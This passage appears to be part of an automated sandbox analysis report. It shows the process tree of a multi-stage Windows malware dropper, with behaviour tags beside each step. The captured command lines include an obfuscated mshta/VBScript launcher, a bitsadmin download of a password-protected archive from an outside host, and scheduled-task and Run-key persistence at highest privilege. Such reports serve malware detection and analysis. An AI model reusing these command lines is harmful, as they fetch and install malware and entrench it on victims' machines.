C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe"C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\_6or44rEubg9iZ3VdoaC4XXg.exe"C:\Users\Admin\Pictures\Adobe Films\_6or44rEubg9iZ3VdoaC4XXg.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe"C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe"7⤵
-
C:\Users\Admin\Documents\F0fWXNnxZj_qi5nVpm1Or_a1.exe"C:\Users\Admin\Documents\F0fWXNnxZj_qi5nVpm1Or_a1.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe"C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "i8hX2rb2gYWCXaUEOy3W51c_.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe"C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe" -u10⤵
-
C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe"C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe"C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe"C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PGC87.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp"C:\Users\Admin\AppData\Local\Temp\is-PGC87.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp" /SL5="$602F2,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-EJGDS.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-EJGDS.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\ee-2a830-a09-7bfbd-e78e64917a91b\Juvekigate.exe"C:\Users\Admin\AppData\Local\Temp\ee-2a830-a09-7bfbd-e78e64917a91b\Juvekigate.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4kowi0yo.flz\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\4kowi0yo.flz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\4kowi0yo.flz\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10092 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exeC:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exe /qn CAMPAIGN="654"14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\p1ekqw35.4b4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635544059 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exeC:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe"C:\Users\Admin\AppData\Local\Temp\hixwzclj.ral\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mwb5jy0.qcz\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\4mwb5jy0.qcz\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\4mwb5jy0.qcz\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 23615⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sqvb4zsg.bmb\autosubplayer.exe /S & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\sqvb4zsg.bmb\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\sqvb4zsg.bmb\autosubplayer.exe /S14⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd15⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd16⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsoA3DA.tmp\tempfile.ps1"15⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
- Drops file in Program Files directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x1zebnah.qau\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\x1zebnah.qau\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\x1zebnah.qau\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 23615⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypacxzzf.wkd\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ypacxzzf.wkd\installer.exeC:\Users\Admin\AppData\Local\Temp\ypacxzzf.wkd\installer.exe /qn CAMPAIGN="654"14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exeC:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe"C:\Users\Admin\AppData\Local\Temp\kfalnwle.irg\any.exe" -u15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cpexx3qf.omw\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\cpexx3qf.omw\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\cpexx3qf.omw\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 23615⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uavv3uan.kld\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe"C:\Users\Admin\Pictures\Adobe Films\hkAZQUdE7y720uA2jdtj5skU.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff87886dec0,0x7ff87886ded0,0x7ff87886dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff70b9e9e70,0x7ff70b9e9e80,0x7ff70b9e9e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,15229691010207326713,18239731444127179867,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5696_600834598" --mojo-platform-channel-handle=1764 /prefetch:812⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe"C:\Users\Admin\Pictures\Adobe Films\Gav9xdYNZl8Zb_Q49AqR0WeW.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\iYGd7u5Uk_Ib_3Gb94q_cYxs.exe"C:\Users\Admin\Pictures\Adobe Films\iYGd7u5Uk_Ib_3Gb94q_cYxs.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\cli.exe"C:\Users\Admin\AppData\Local\Temp\cli.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Pictures\Adobe Films\bwkxPh1yL2Wkm1rmvTMe2VTO.exe"C:\Users\Admin\Pictures\Adobe Films\bwkxPh1yL2Wkm1rmvTMe2VTO.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 12608⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe"C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\Y_p1ACnNV_8eXhUvQTx5FOX2.exe"C:\Users\Admin\Pictures\Adobe Films\Y_p1ACnNV_8eXhUvQTx5FOX2.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\1uT2d0BkeE_DJquEcpjI45YJ.exe"C:\Users\Admin\Pictures\Adobe Films\1uT2d0BkeE_DJquEcpjI45YJ.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\q2NUgOj7NxZeJYYXzRNGaWUt.exe"C:\Users\Admin\Pictures\Adobe Films\q2NUgOj7NxZeJYYXzRNGaWUt.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe"C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe"C:\Users\Admin\Pictures\Adobe Films\XkYUSm_BYC_RZqlw0pSLKPVp.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 2089⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\FMTnjSf044j05Xl8dMd_dNnh.exe"C:\Users\Admin\Pictures\Adobe Films\FMTnjSf044j05Xl8dMd_dNnh.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 4008⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\QFWlN69O9FNkcWfwdW6z88Ve.exe"C:\Users\Admin\Pictures\Adobe Films\QFWlN69O9FNkcWfwdW6z88Ve.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe"C:\Users\Admin\Pictures\Adobe Films\JmrC_y7ZqnosVrDZc7UTR80C.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 2408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\E_OHOPUQK1p49G7oDJQPE6PW.exe"C:\Users\Admin\Pictures\Adobe Films\E_OHOPUQK1p49G7oDJQPE6PW.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\f_qhca_mqGIJHx39G3hKWVKQ.exe"C:\Users\Admin\Pictures\Adobe Films\f_qhca_mqGIJHx39G3hKWVKQ.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 2808⤵
- Loads dropped DLL
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe"C:\Users\Admin\Pictures\Adobe Films\9XMk2MZ_hrB_trxtCmDErnDv.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\iewmuvfYoeYocCWCwej2zCXy.exe"C:\Users\Admin\Pictures\Adobe Films\iewmuvfYoeYocCWCwej2zCXy.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon173a360b525.exeMon173a360b525.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-MJ6MI.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-MJ6MI.tmp\Mon17bbf11fdb575d.tmp" /SL5="$2016C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-ON8NL.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-ON8NL.tmp\Mon17bbf11fdb575d.tmp" /SL5="$1021C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon17bbf11fdb575d.exe" /SILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-BKB4L.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-BKB4L.tmp\postback.exe" ss110⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe"C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe"C:\Users\Admin\Pictures\Adobe Films\75X59NlosCHoajTjpeDlodY1.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe"C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\0jXluebhN_4bn2qf28JNKLOw.exe"C:\Users\Admin\Documents\0jXluebhN_4bn2qf28JNKLOw.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe"C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe"C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 27210⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe"C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe"C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe"C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 178010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"9⤵
-
